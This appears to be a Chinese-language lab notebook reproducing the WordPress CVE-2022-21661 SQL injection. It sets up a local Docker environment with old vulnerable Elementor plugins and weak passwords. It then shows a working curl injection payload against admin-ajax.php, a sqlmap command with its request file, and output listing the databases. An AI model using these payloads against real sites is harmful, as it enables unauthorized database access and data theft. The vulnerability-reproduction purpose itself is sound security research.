cd /tmp;
git clone https://github.com/WellingtonEspindula/SSI-CVE-2022-21661/
apt install -y docker-compose &
docker pull mysql:5.7 ;docker pull wordpress:5.8.1 ; docker pull wordpress:cli;
root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661# dpkg -l | grep docker-compose
ii docker-compose 1.29.2-1 all define and run multi-container Docker applications with YAML
root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661#
自定义docker-compose.yml ,自己修改后的就叫:Gdocker-compose.yml
version: "3.3"
services:
db:
image: mysql:5.7
volumes:
- db_data:/var/lib/mysql
ports:
- 33060:3306
restart: always
environment:
MYSQL_ROOT_PASSWORD: somewordpress
MYSQL_DATABASE: wordpress
MYSQL_USER: wordpress
MYSQL_PASSWORD: wordpress
healthcheck:
test: mysqladmin ping -h 127.0.0.1 -u $MYSQL_USER --password=$MYSQL_PASSWORD
start_period: 5s
interval: 5s
timeout: 5s
retries: 55
wordpress:
depends_on:
db:
condition: service_healthy
image: wordpress:5.8.1
ports:
- 8000:80
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_NAME: wordpress
WORDPRESS_DB_USER: wordpress
WORDPRESS_DB_PASSWORD: wordpress
WORDPRESS_TABLE_PREFIX: "wp_"
WORDPRESS_DEBUG: 1
volumes:
- wp_data:/var/www/html
wordpress-cli:
depends_on:
- db
- wordpress
image: wordpress:cli
user: root
stdin_open: true
tty: true
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_NAME: wordpress
WORDPRESS_DB_USER: wordpress
WORDPRESS_DB_PASSWORD: wordpress
command: >
/bin/sh -c '
id;
cat /etc/hosts;
ip add;
sleep 3;
wp --allow-root core install --url="http://127.0.0.1:8000" --title="CVE2022-21661" --admin_user=admin --admin_password=admin --admin_email=foo@bar.com;
wp --allow-root plugin install elementor --version=3.5.0 --activate;
wp --allow-root plugin install ele-custom-skin --version=3.1.3 --activate;
wp --allow-root theme install hello-elementor --version=2.5.0 --activate;
wp --allow-root user create tom tom@tom.com --user_pass="weakpassword";
wp --allow-root user create leo leo@leo.com --user_pass="strongpassword";
wp --allow-root user create bassam bassam@bassam.com --user_pass="pinto99";
chown -R 33:33 /var/www/html;
chmod -R 0777 /var/www/html;
cat /etc/passwd;
wp config set WP_DEBUG true --raw --allow-root;
wp config set WP_DEBUG_LOG true --raw --allow-root;
wp config set WP_DEBUG_LOG "/var/www/html/aab.log" --allow-root;
wp config set WP_DEBUG_DISPLAY true --raw --allow-root;
bash;
'
volumes:
- wp_data:/var/www/html
volumes:
db_data:
wp_data:
wp --allow-root plugin install elementor --version=3.6.2 --activate;
这个3.6.2版本也是可以的,况且存在这个漏洞,可以一起测试
#https://www.exploit-db.com/exploits/50882
#WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
启动3个docker:
docker-compose -f /tmp/SSI-CVE-2022-21661/Gdocker-compose.yml up -d
查看日志:
docker logs -f ssi-cve-2022-21661_wordpress-cli_1 ;
mysql容器连接测试:
docker exec -it ssi-cve-2022-21661_db_1 bash
mysql -h 127.0.0.1 -u wordpress --password=wordpress -e "select now();"
使用curl进行sql注入测试(参考SSI-CVE-2022-21661/example.md at master · WellingtonEspindula/SSI-CVE-2022-21661 · GitHub):
curl -x http://127.0.0.1:8080/ -i --compressed -k -X $'POST' \
-H $'Host: 127.0.0.1:8000' -H $'User-Agent: python-requests/2.28.1' -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept: */*' -H $'Connection: keep-alive' -H $'Content-Length: 287' -H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d' \
$'http://127.0.0.1:8000/wp-admin/admin-ajax.php'
http://127.0.0.1:8080/ 是burpsuite 2022起的http代理,方便观察.
祭出大杀器sqlmap:
set cmdpath2024=c:\Python310\python
%cmdpath2024% E:\BaiduNetdiskDownload\sqlmapproject-sqlmap-796173f\sqlmap.py -vvv -r ./rr2024.txt --dbms=mysql --technique=E --prefix="23) " --suffix="#" --threads=4 --current-db --is-dba --dbs --proxy=http://127.0.0.1:8080
# sqlmap {1.6.2.4#dev} , 支持python3.10
rr2024.txt如下:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: curl/7.87.0
Accept: */*
Content-Length: 131
Content-Type: application/x-www-form-urlencoded
Connection: close
action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}&ecs_ajax_settings={"post_id":"1", "current_page":1, "widget_id":1, "theme_id":1, "max_num_pages":10}
得到结果:
web server operating system: Linux Debian
web application technology: PHP 7.4.25, Apache 2.4.51
back-end DBMS: MySQL >= 5.1
[18:49:47] [INFO] fetching current database
[18:49:49] [INFO] retrieved: 'wordpress'
current database: 'wordpress'
[18:49:49] [INFO] testing if current user is DBA
[18:49:49] [INFO] fetching current user
[18:49:51] [INFO] retrieved: 'wordpress@%'
current user is DBA: False
[18:49:52] [INFO] fetching database names
[18:49:56] [INFO] retrieved: 'information_schema'
[18:49:56] [INFO] retrieved: 'wordpress'
[18:49:56] [DEBUG] performed 3 queries in 3.61 seconds
available databases [2]:
[*] information_schema
[*] wordpress
其它辅助参考资料:
https://github.com/daniel616/CVE-2022-21661-Demo
#wp --allow-root theme install https://downloads.wordpress.org/theme/hello-elementor.3.1.1.zip --activate
#wp --allow-root theme install /path/to/hello-elementor.3.1.1.zip --activate
#https://raw.githubusercontent.com/elementor/elementor/main/changelog.txt
# curl https://api.wordpress.org/plugins/info/1.0/elementor.json
#https://downloads.wordpress.org/plugin/elementor.3.25.1.zip
#https://downloads.wordpress.org/plugin/elementor.3.6.2.zip
#https://downloads.wordpress.org/plugin/elementor.3.11.0.zip
cd /tmp&&curl -vk4O https://downloads.wordpress.org/theme/hello-elementor.2.1.0.zip
cd /tmp&&curl -vk4O https://downloads.wordpress.org/theme/hello-elementor.2.5.0.zip
cd /tmp&&curl -vk4O https://downloads.wordpress.org/theme/hello-elementor.2.7.0.zip
https://forum.butian.net/share/1324
漏洞简介
这是最近爆出来的一个 wordpress 的 SQL注入漏洞,实际上不是一个可以直接利用的洞,而是wordpress的一个核心函数 WP_Query的漏洞,这个函数常被插件使用,因此能造成的危害也挺大,前台后台都有可能。